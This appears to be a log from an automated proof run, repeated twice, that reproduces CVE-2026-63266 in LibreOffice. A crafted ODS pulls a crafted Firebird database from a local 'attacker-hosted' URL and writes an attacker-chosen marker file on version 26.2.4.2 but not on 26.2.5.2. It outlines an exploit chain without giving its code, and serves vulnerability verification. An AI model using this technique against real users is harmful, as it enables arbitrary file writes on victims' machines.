=== CVE-2026-63266 reproduction === ROOT=/workspace/bundle HOME=/home/vscode user=vscode Mon Oct 5 20:34:18 UTC 2026 --- project_cache_context.json --- { "project_id": "0f8b4e04-e073-4b96-a20a-5fcc8994fa79", "requested_cache_mode": "auto", "resolved_cache_mode": "infra_cache", "cache_hit": false, "project_cache_entry_id": null, "learning_context_mode": "enabled", "prepared": true, "project_cache_dir": "/pruva/project-cache", "repo_mirror_dir": "/pruva/project-cache/repo-mirrors", "cache_manifest_path": "/pruva/project-cache/.pruva/cache_manifest.json", "cache_manifest_schema_version": 1, "durable_cache_budgets": { "project_max_bytes": 17179869184, "project_max_inodes": 500000, "root_max_bytes": 68719476736, "root_max_inodes": 2000000 }, "backend_support": "prepared", "fallback_reason": null, "allowed_reuse_classes": [ "infrastructure", "repo", "package", "toolchain", "build" ], "reuse_safety_policy": "Only paths declared in the typed cache manifest are persisted. Run-authored entries remain run_generated and are visible only in warm_proof_carry; lower modes materialize only exact-byte worker_attested entries in allowed classes. Cached build outputs remain valid only when source path, commit/ref, dependency lockfiles, toolchain, and build flags match the current script.", "proof_policy": "Fresh proof is required for the current run. Historical proof artifacts may only be used as explicit reference material in warm_proof_carry mode.", "proof_carry": null }project_cache_dir=/pruva/project-cache (this proof uses official product builds; the repo mirror is not required) attacker-chosen arbitrary writable target: /home/vscode/CVE-2026-63266_PWNED.marker scratch dir: /home/vscode/.cache/pruva-cve-2026-63266 cached OK: /home/vscode/.cache/pruva-cve-2026-63266/LibreOffice_26.2.4.2_Linux_x86-64_deb.tar.gz cached OK: /home/vscode/.cache/pruva-cve-2026-63266/LibreOffice_26.2.5.2_Linux_x86-64_deb.tar.gz already extracted: /home/vscode/.cache/pruva-cve-2026-63266/lo-vuln already extracted: /home/vscode/.cache/pruva-cve-2026-63266/lo-fixed vulnerable product: LibreOffice 26.2.4.2 0229ac93fcf0d7cbc6376066c6f35021cef002dc fixed product: LibreOffice 26.2.5.2 cd7284b4cbbfeb507e630c1aac019f4157393acb vulnerable build commit: 0229ac93fcf0d7cbc6376066c6f35021cef002dc fixed build commit: cd7284b4cbbfeb507e630c1aac019f4157393acb cached OK: /home/vscode/.cache/pruva-cve-2026-63266/firebird-3.0.14.amd64.tar.gz crafted database built crafted backup: 09f5cba9358d5cab6e322624dccf1560adf54104c2d9401f044b2e72e8db7fcd evil.odb assembled attacker-hosted database URL: http://127.0.0.1:8378/evil.odb evil.ods assembled attacker server healthcheck OK --- attempt vulnerable-1: opening crafted ODS via real Calc document path --- attempt vulnerable-1 result: exit=134 odb_gets=2 marker=PRESENT { "role": "vulnerable", "attempt": 1, "soffice_exit_code": 134, "odb_http_get_requests": 2, "marker_present": true, "marker_sha256": "1260a2cf1a88f5884cf8d0e3dd4fb6e521c27e51d31bf88e97a41567632a9182", "marker_contains_target_path": true }--- attempt vulnerable-2: opening crafted ODS via real Calc document path --- attempt vulnerable-2 result: exit=134 odb_gets=2 marker=PRESENT { "role": "vulnerable", "attempt": 2, "soffice_exit_code": 134, "odb_http_get_requests": 2, "marker_present": true, "marker_sha256": "55088eb98ab94e51cc6b8d4805ce030c9f2f586c1b6cbd519ce29440fdb079e0", "marker_contains_target_path": true }--- attempt fixed-1: opening crafted ODS via real Calc document path --- attempt fixed-1 result: exit=0 odb_gets=0 marker=absent { "role": "fixed", "attempt": 1, "soffice_exit_code": 0, "odb_http_get_requests": 0, "marker_present": false }--- attempt fixed-2: opening crafted ODS via real Calc document path --- attempt fixed-2 result: exit=0 odb_gets=0 marker=absent { "role": "fixed", "attempt": 2, "soffice_exit_code": 0, "odb_http_get_requests": 0, "marker_present": false }runtime_manifest.json written === verdict: confirmed=True === CVE-2026-63266 CONFIRMED: crafted ODS opened in LibreOffice 26.2.4.2 wrote the file /home/vscode/CVE-2026-63266_PWNED.marker (attacker-chosen, outside any LibreOffice/Firebird private directory); the same document opened in LibreOffice 26.2.5.2 did not. === CVE-2026-63266 reproduction === ROOT=/workspace/bundle HOME=/home/vscode user=vscode Mon Oct 5 20:34:57 UTC 2026 --- project_cache_context.json --- { "project_id": "0f8b4e04-e073-4b96-a20a-5fcc8994fa79", "requested_cache_mode": "auto", "resolved_cache_mode": "infra_cache", "cache_hit": false, "project_cache_entry_id": null, "learning_context_mode": "enabled", "prepared": true, "project_cache_dir": "/pruva/project-cache", "repo_mirror_dir": "/pruva/project-cache/repo-mirrors", "cache_manifest_path": "/pruva/project-cache/.pruva/cache_manifest.json", "cache_manifest_schema_version": 1, "durable_cache_budgets": { "project_max_bytes": 17179869184, "project_max_inodes": 500000, "root_max_bytes": 68719476736, "root_max_inodes": 2000000 }, "backend_support": "prepared", "fallback_reason": null, "allowed_reuse_classes": [ "infrastructure", "repo", "package", "toolchain", "build" ], "reuse_safety_policy": "Only paths declared in the typed cache manifest are persisted. Run-authored entries remain run_generated and are visible only in warm_proof_carry; lower modes materialize only exact-byte worker_attested entries in allowed classes. Cached build outputs remain valid only when source path, commit/ref, dependency lockfiles, toolchain, and build flags match the current script.", "proof_policy": "Fresh proof is required for the current run. Historical proof artifacts may only be used as explicit reference material in warm_proof_carry mode.", "proof_carry": null }project_cache_dir=/pruva/project-cache (this proof uses official product builds; the repo mirror is not required) attacker-chosen arbitrary writable target: /home/vscode/CVE-2026-63266_PWNED.marker scratch dir: /home/vscode/.cache/pruva-cve-2026-63266 cached OK: /home/vscode/.cache/pruva-cve-2026-63266/LibreOffice_26.2.4.2_Linux_x86-64_deb.tar.gz cached OK: /home/vscode/.cache/pruva-cve-2026-63266/LibreOffice_26.2.5.2_Linux_x86-64_deb.tar.gz already extracted: /home/vscode/.cache/pruva-cve-2026-63266/lo-vuln already extracted: /home/vscode/.cache/pruva-cve-2026-63266/lo-fixed vulnerable product: LibreOffice 26.2.4.2 0229ac93fcf0d7cbc6376066c6f35021cef002dc fixed product: LibreOffice 26.2.5.2 cd7284b4cbbfeb507e630c1aac019f4157393acb vulnerable build commit: 0229ac93fcf0d7cbc6376066c6f35021cef002dc fixed build commit: cd7284b4cbbfeb507e630c1aac019f4157393acb cached OK: /home/vscode/.cache/pruva-cve-2026-63266/firebird-3.0.14.amd64.tar.gz crafted database built crafted backup: 7a1277ddbed6d849ae718a57c33f5f8bb0f07fcb78db313b5cdc401bb01fc4f9 evil.odb assembled attacker-hosted database URL: http://127.0.0.1:8379/evil.odb evil.ods assembled attacker server healthcheck OK --- attempt vulnerable-1: opening crafted ODS via real Calc document path --- attempt vulnerable-1 result: exit=134 odb_gets=2 marker=PRESENT { "role": "vulnerable", "attempt": 1, "soffice_exit_code": 134, "odb_http_get_requests": 2, "marker_present": true, "marker_sha256": "163ad51b66df5f13d42bd2ace8ae137526ecffe539a256e881e60a3113759d40", "marker_contains_target_path": true }--- attempt vulnerable-2: opening crafted ODS via real Calc document path --- attempt vulnerable-2 result: exit=134 odb_gets=2 marker=PRESENT { "role": "vulnerable", "attempt": 2, "soffice_exit_code": 134, "odb_http_get_requests": 2, "marker_present": true, "marker_sha256": "2d723ba589ea8f9a6a552a51d6b3b856947182f385bdc55692e477d769be6d9a", "marker_contains_target_path": true }--- attempt fixed-1: opening crafted ODS via real Calc document path --- attempt fixed-1 result: exit=0 odb_gets=0 marker=absent { "role": "fixed", "attempt": 1, "soffice_exit_code": 0, "odb_http_get_requests": 0, "marker_present": false }--- attempt fixed-2: opening crafted ODS via real Calc document path --- attempt fixed-2 result: exit=0 odb_gets=0 marker=absent { "role": "fixed", "attempt": 2, "soffice_exit_code": 0, "odb_http_get_requests": 0, "marker_present": false }runtime_manifest.json written === verdict: confirmed=True === CVE-2026-63266 CONFIRMED: crafted ODS opened in LibreOffice 26.2.4.2 wrote the file /home/vscode/CVE-2026-63266_PWNED.marker (attacker-chosen, outside any LibreOffice/Firebird private directory); the same document opened in LibreOffice 26.2.5.2 did not.